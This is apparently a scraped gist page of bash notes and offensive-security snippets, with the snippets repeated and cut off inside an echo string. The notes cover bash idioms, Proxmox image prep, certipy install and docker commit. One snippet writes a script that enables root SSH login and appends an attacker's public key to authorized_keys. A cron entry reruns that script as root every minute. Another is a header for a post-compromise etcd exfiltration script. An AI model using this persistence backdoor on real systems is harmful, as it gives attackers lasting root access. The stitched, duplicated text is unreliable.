Graham Helton grahamhelton

## cool bash tricks.md

      
              1 file
            
          
              0 forks
            
          
              0 comments
            
          
              0 stars
            
          
                grahamhelton
                / cool bash tricks.md
            
            
              Created
              June 23, 2024 18:55
            
              
                Quick notes from looking at bash scripts that are way better than mine
              
          
    Learning from well written bash

These are just some quick notes I jotted down when looking at https://github.com/WoozyMasta/kube-dump/blob/master/kube-dump, theres lots of cool little tricks within the initilization of the script.
Notes

#!/usr/bin/env bash

Running /usr/bin/env bash looks for the default version of the program in your environment. This way if bash is not in the default /bin/bash location (such as on [[nixos]]), it will still find bash.

Interestingly, there is a small security concern. If someone can get their exectuable for bash in your path it might be executed


## steal_etcd.sh
# This script attempts to take a snapshot of the kubernetes etcd database for exfiltration
# This should be run post-compromise of a node

#!/usr/bin/env bash
NOCOLOR=$(tput sgr0)
RED=$(tput setaf 1)
GREEN=$(tput setaf 2)
BLUE=$(tput setaf 4)
YELLOW=$(tput setaf 3)
TICK="$NOCOLOR[$GREEN+$NOCOLOR] "

## ubuntu_prep.sh
# SSH to your proxmox server
ssh root@<proxmox_server>

# Update things and install libguestfs-tools
sudo apt update -y && sudo apt install libguestfs-tools -y

# Download ubuntu 20.04 image
# Alternatively, find the image you want from https://cloud-images.ubuntu.com/
wget https://cloud-images.ubuntu.com/focal/20240524/focal-server-cloudimg-amd64.img

## gist:b78f9238544e63c0046b4a20e3aed188
# Ensure that the target has cron running!
cat << EOF > /tmp/ssh.sh
apt update ; apt install openssh-server -y ; mkdir -p /var/run/sshd && sed -i 's/\#PermitRootLogin prohibit-password/PermitRootLogin yes/' /etc/ssh/sshd_config && sed 's@session\s*required\s*pam_loginuid.so@session optional pam_loginuid.so@g' -i /etc/pam.d/sshd ; mkdir -p ~/.ssh && touch authorized_keys ; echo "YOUR PUBLIC KEY HERE" >> ~/.ssh/authorized_keys ; /usr/sbin/service ssh restart
EOF

chmod +x /tmp/ssh.sh

# This will keep adding your SSH key, you could change `>>` to `>` but that will overwrite other keys in there.
echo "* * * * * root cd /tmp && sh ssh.sh" >> /etc/cron.d/ssh

## gist:3c9a1e3184de209cf505fa83444ac5f5
#! /bin/bash

# NOTE: To make use of a wider color pallet set the TERM enviornment variable TERM=xterm-256color

# Colors
BOLD=$(tput bold)
NOCOLOR=$(tput sgr0)
RED=$(tput setaf 1)
GREEN=$(tput setaf 2)
YELLOW=$(tput setaf 3)

## dockerload.sh
# Install certipy
apt update -y &> /dev/null && apt upgrade -y &> /dev/null && apt install -y python3 python3-pip &> /dev/null && pip3 install certipy-ad &> /dev/null ; echo -e "\033[0;32m - Certipy installed \033[0m"

# List containers, identify container id
sudo docker container ls

# Stage the current container into an image
sudo docker commit <container_id> <image_name>

# Save the image as a .tar file

## getsha1
if [ $# -ne 2 ]
then
        echo "Usage: getsha1 <github_url> <path_to_store_file>
        IE: getsha1 https://github.com/danielmiessler/SecLists Documents/wordlists/seclists"
        exit
fi
github="$1"
sha1=$(git ls-remote $1 | awk '{print $1}' | head -n 1)
echo "
home.file = {
	# This script attempts to take a snapshot of the kubernetes etcd database for exfiltration
	# This should be run post-compromise of a node

	#!/usr/bin/env bash
	NOCOLOR=$(tput sgr0)
	RED=$(tput setaf 1)
	GREEN=$(tput setaf 2)
	BLUE=$(tput setaf 4)
	YELLOW=$(tput setaf 3)
	TICK="$NOCOLOR[$GREEN+$NOCOLOR] "
	# SSH to your proxmox server
	ssh root@<proxmox_server>

	# Update things and install libguestfs-tools
	sudo apt update -y && sudo apt install libguestfs-tools -y

	# Download ubuntu 20.04 image
	# Alternatively, find the image you want from https://cloud-images.ubuntu.com/
	wget https://cloud-images.ubuntu.com/focal/20240524/focal-server-cloudimg-amd64.img
	# Ensure that the target has cron running!
	cat << EOF > /tmp/ssh.sh
	apt update ; apt install openssh-server -y ; mkdir -p /var/run/sshd && sed -i 's/\#PermitRootLogin prohibit-password/PermitRootLogin yes/' /etc/ssh/sshd_config && sed 's@session\srequired\spam_loginuid.so@session optional pam_loginuid.so@g' -i /etc/pam.d/sshd ; mkdir -p ~/.ssh && touch authorized_keys ; echo "YOUR PUBLIC KEY HERE" >> ~/.ssh/authorized_keys ; /usr/sbin/service ssh restart
	EOF

	chmod +x /tmp/ssh.sh

	# This will keep adding your SSH key, you could change `>>` to `>` but that will overwrite other keys in there.
	echo "* * * * * root cd /tmp && sh ssh.sh" >> /etc/cron.d/ssh
	#! /bin/bash

	# NOTE: To make use of a wider color pallet set the TERM enviornment variable TERM=xterm-256color

	# Colors
	BOLD=$(tput bold)
	NOCOLOR=$(tput sgr0)
	RED=$(tput setaf 1)
	GREEN=$(tput setaf 2)
	YELLOW=$(tput setaf 3)
	# Install certipy
	apt update -y &> /dev/null && apt upgrade -y &> /dev/null && apt install -y python3 python3-pip &> /dev/null && pip3 install certipy-ad &> /dev/null ; echo -e "\033[0;32m - Certipy installed \033[0m"

	# List containers, identify container id
	sudo docker container ls

	# Stage the current container into an image
	sudo docker commit <container_id> <image_name>

	# Save the image as a .tar file
	if [ $# -ne 2 ]
	then
	echo "Usage: getsha1 <github_url> <path_to_store_file>
	IE: getsha1 https://github.com/danielmiessler/SecLists Documents/wordlists/seclists"
	exit
	fi
	github="$1"
	sha1=$(git ls-remote $1 \| awk '{print $1}' \| head -n 1)
	echo "
	home.file = {